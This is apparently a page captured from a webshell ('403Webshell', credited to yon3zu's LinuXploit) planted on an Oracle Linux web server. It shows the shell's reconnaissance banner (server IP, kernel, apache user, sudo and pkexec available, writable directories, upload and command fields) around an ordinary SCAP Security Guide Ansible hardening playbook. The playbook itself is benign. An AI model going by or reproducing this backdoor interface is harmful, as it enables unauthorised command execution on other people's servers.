403Webshell
Server IP : 178.212.43.201  /  Your IP : 10.100.0.33
Web Server : Apache/2.4.37 (Oracle Linux Server) OpenSSL/1.1.1k
System : Linux spa0007.srv.paxillus.pl 5.4.17-2136.355.3.1.el8uek.x86_64 #3 SMP Sat May 9 17:11:55 PDT 2026 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/scap-security-guide/ansible/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/scap-security-guide/ansible/ol7-playbook-sap.yml
---
###############################################################################
#
# Ansible Playbook for Security Profile of Oracle Linux 7 for SAP
#
# Profile Description:
# This profile contains rules for Oracle Linux 7 Operating System in compliance with SAP note 2069760 and SAP Security Baseline Template version 1.9 Item I-8 and section 4.1.2.2.
# Regardless of your system's workload all of these checks should pass.
#
# Profile ID:  xccdf_org.ssgproject.content_profile_sap
# Benchmark ID:  xccdf_org.ssgproject.content_benchmark_OL-7
# Benchmark Version:  0.1.80
# XCCDF Version:  1.2
#
# This file can be generated by OpenSCAP using:
# $ oscap xccdf generate fix --profile xccdf_org.ssgproject.content_profile_sap --fix-type ansible ssg-ol7-ds.xml
#
# This Ansible Playbook is generated from an XCCDF profile without preliminary evaluation.
# It attempts to fix every selected rule, even if the system is already compliant.
#
# How to apply this Ansible Playbook:
# $ ansible-playbook -i "localhost," -c local playbook.yml
# $ ansible-playbook -i "192.168.1.155," playbook.yml
# $ ansible-playbook -i inventory.ini playbook.yml
#
###############################################################################

- name: Ansible Playbook for xccdf_org.ssgproject.content_profile_sap
  hosts: all
  vars: {}
  tasks:

  - name: Gather the package facts
    ansible.builtin.package_facts:
      manager: auto
    tags:
    - always

  - name: Ensure glibc is installed
    ansible.builtin.package:
      name: glibc
      state: present
    tags:
    - enable_strategy
    - low_complexity
    - low_disruption
    - medium_severity
    - no_reboot_needed
    - package_glibc_installed

  - name: Ensure uuidd is installed
    ansible.builtin.package:
      name: uuidd
      state: present
    tags:
    - enable_strategy
    - low_complexity
    - low_disruption
    - medium_severity
    - no_reboot_needed
    - package_uuidd_installed

  - name: 'Remove NIS Client: Ensure ypbind is removed'
    ansible.builtin.package:
      name: ypbind
      state: absent
    tags:
    - PCI-DSSv4-2.2
    - PCI-DSSv4-2.2.4
    - disable_strategy
    - low_complexity
    - low_disruption
    - no_reboot_needed
    - package_ypbind_removed
    - unknown_severity

  - name: 'Uninstall ypserv Package: Ensure ypserv is removed'
    ansible.builtin.package:
      name: ypserv
      state: absent
    tags:
    - DISA-STIG-OL07-00-020010
    - NIST-800-53-CM-6(a)
    - NIST-800-53-CM-7(a)
    - NIST-800-53-CM-7(b)
    - NIST-800-53-IA-5(1)(c)
    - PCI-DSS-Req-2.2.2
    - PCI-DSSv4-2.2
    - PCI-DSSv4-2.2.4
    - disable_strategy
    - high_severity
    - low_complexity
    - low_disruption
    - no_reboot_needed
    - package_ypserv_removed

  - name: Gather the package facts
    ansible.builtin.package_facts:
      manager: auto
    tags:
    - always

  - name: Disable rlogin Service - Disable service rlogin
    block:

    - name: Disable rlogin Service - Collect systemd Services Present in the System
      ansible.builtin.command: systemctl -q list-unit-files --type service
      register: service_exists
      changed_when: false
      failed_when: service_exists.rc not in [0, 1]
      check_mode: false

    - name: Disable rlogin Service - Ensure rlogin.service is Masked
      ansible.builtin.systemd:
        name: rlogin.service
        state: stopped
        enabled: false
        masked: true
      when: service_exists.stdout_lines is search("rlogin.service", multiline=True)

    - name: Unit Socket Exists - rlogin.socket
      ansible.builtin.command: systemctl -q list-unit-files rlogin.socket
      register: socket_file_exists
      changed_when: false
      failed_when: socket_file_exists.rc not in [0, 1]
      check_mode: false

    - name: Disable rlogin Service - Disable Socket rlogin
      ansible.builtin.systemd:
        name: rlogin.socket
        enabled: false
        state: stopped
        masked: true
      when: socket_file_exists.stdout_lines is search("rlogin.socket", multiline=True)
    tags:
    - NIST-800-171-3.1.13
    - NIST-800-171-3.4.7
    - NIST-800-53-CM-6(a)
    - NIST-800-53-CM-7(a)
    - NIST-800-53-CM-7(b)
    - NIST-800-53-IA-5(1)(c)
    - disable_strategy
    - high_severity
    - low_complexity
    - low_disruption
    - no_reboot_needed
    - service_rlogin_disabled
    - special_service_block
    when: ("kernel" in ansible_facts.packages or "kernel-uek" in ansible_facts.packages)

  - name: Disable rsh Service - Disable service rsh
    block:

    - name: Disable rsh Service - Collect systemd Services Present in the System
      ansible.builtin.command: systemctl -q list-unit-files --type service
      register: service_exists
      changed_when: false
      failed_when: service_exists.rc not in [0, 1]
      check_mode: false

    - name: Disable rsh Service - Ensure rsh.service is Masked
      ansible.builtin.systemd:
        name: rsh.service
        state: stopped
        enabled: false
        masked: true
      when: service_exists.stdout_lines is search("rsh.service", multiline=True)

    - name: Unit Socket Exists - rsh.socket
      ansible.builtin.command: systemctl -q list-unit-files rsh.socket
      register: socket_file_exists
      changed_when: false
      failed_when: socket_file_exists.rc not in [0, 1]
      check_mode: false

    - name: Disable rsh Service - Disable Socket rsh
      ansible.builtin.systemd:
        name: rsh.socket
        enabled: false
        state: stopped
        masked: true
      when: socket_file_exists.stdout_lines is search("rsh.socket", multiline=True)
    tags:
    - NIST-800-171-3.1.13
    - NIST-800-171-3.4.7
    - NIST-800-53-CM-6(a)
    - NIST-800-53-CM-7(a)
    - NIST-800-53-CM-7(b)
    - NIST-800-53-IA-5(1)(c)
    - disable_strategy
    - high_severity
    - low_complexity
    - low_disruption
    - no_reboot_needed
    - service_rsh_disabled
    - special_service_block
    when: ("kernel" in ansible_facts.packages or "kernel-uek" in ansible_facts.packages)

  - name: Gather the service facts
    ansible.builtin.service_facts: null
    tags:
    - always

  - name: Test for existence /etc/shadow
    ansible.builtin.stat:
      path: /etc/shadow
    register: file_exists
    tags:
    - CJIS-5.5.2.2
    - NIST-800-53-AC-6(1)
    - NIST-800-53-CM-6(a)
    - PCI-DSS-Req-8.7.c
    - PCI-DSSv4-2.2
    - PCI-DSSv4-2.2.6
    - configure_strategy
    - file_permissions_etc_shadow
    - low_complexity
    - low_disruption
    - medium_severity
    - no_reboot_needed

  - name: Ensure permission u-xwrs,g-xwrs,o-xwrt on /etc/shadow
    ansible.builtin.file:
      path: /etc/shadow
      mode: u-xwrs,g-xwrs,o-xwrt
    when: file_exists.stat is defined and file_exists.stat.exists
    tags:
    - CJIS-5.5.2.2
    - NIST-800-53-AC-6(1)
    - NIST-800-53-CM-6(a)
    - PCI-DSS-Req-8.7.c
    - PCI-DSSv4-2.2
    - PCI-DSSv4-2.2.6
    - configure_strategy
    - file_permissions_etc_shadow
    - low_complexity
    - low_disruption
    - medium_severity
    - no_reboot_needed

  - name: Detect .rhosts files in users home directories
    ansible.builtin.find:
      paths:
      - /root
      - /home
      recurse: true
      patterns: .rhosts
      hidden: true
      file_type: file
    check_mode: false
    register: rhosts_locations
    when: '"rsh-server" in ansible_facts.packages'
    tags:
    - NIST-800-53-CM-6(a)
    - NIST-800-53-CM-7(a)
    - NIST-800-53-CM-7(b)
    - high_severity
    - low_complexity
    - low_disruption
    - no_reboot_needed
    - no_rsh_trust_files
    - restrict_strategy

  - name: Remove .rhosts files
    ansible.builtin.file:
      path: '{{ item }}'
      state: absent
    with_items: '{{ rhosts_locations.files | map(attribute=''path'') | list }}'
    when:
    - '"rsh-server" in ansible_facts.packages'
    - rhosts_locations is success
    tags:
    - NIST-800-53-CM-6(a)
    - NIST-800-53-CM-7(a)
    - NIST-800-53-CM-7(b)
    - high_severity
    - low_complexity
    - low_disruption
    - no_reboot_needed
    - no_rsh_trust_files
    - restrict_strategy

  - name: Remove /etc/hosts.equiv file
    ansible.builtin.file:
      path: /etc/hosts.equiv
      state: absent
    when: '"rsh-server" in ansible_facts.packages'
    tags:
    - NIST-800-53-CM-6(a)
    - NIST-800-53-CM-7(a)
    - NIST-800-53-CM-7(b)
    - high_severity
    - low_complexity
    - low_disruption
    - no_reboot_needed
    - no_rsh_trust_files
    - restrict_strategy

Youez - 2016 - github.com/yon3zu
LinuXploit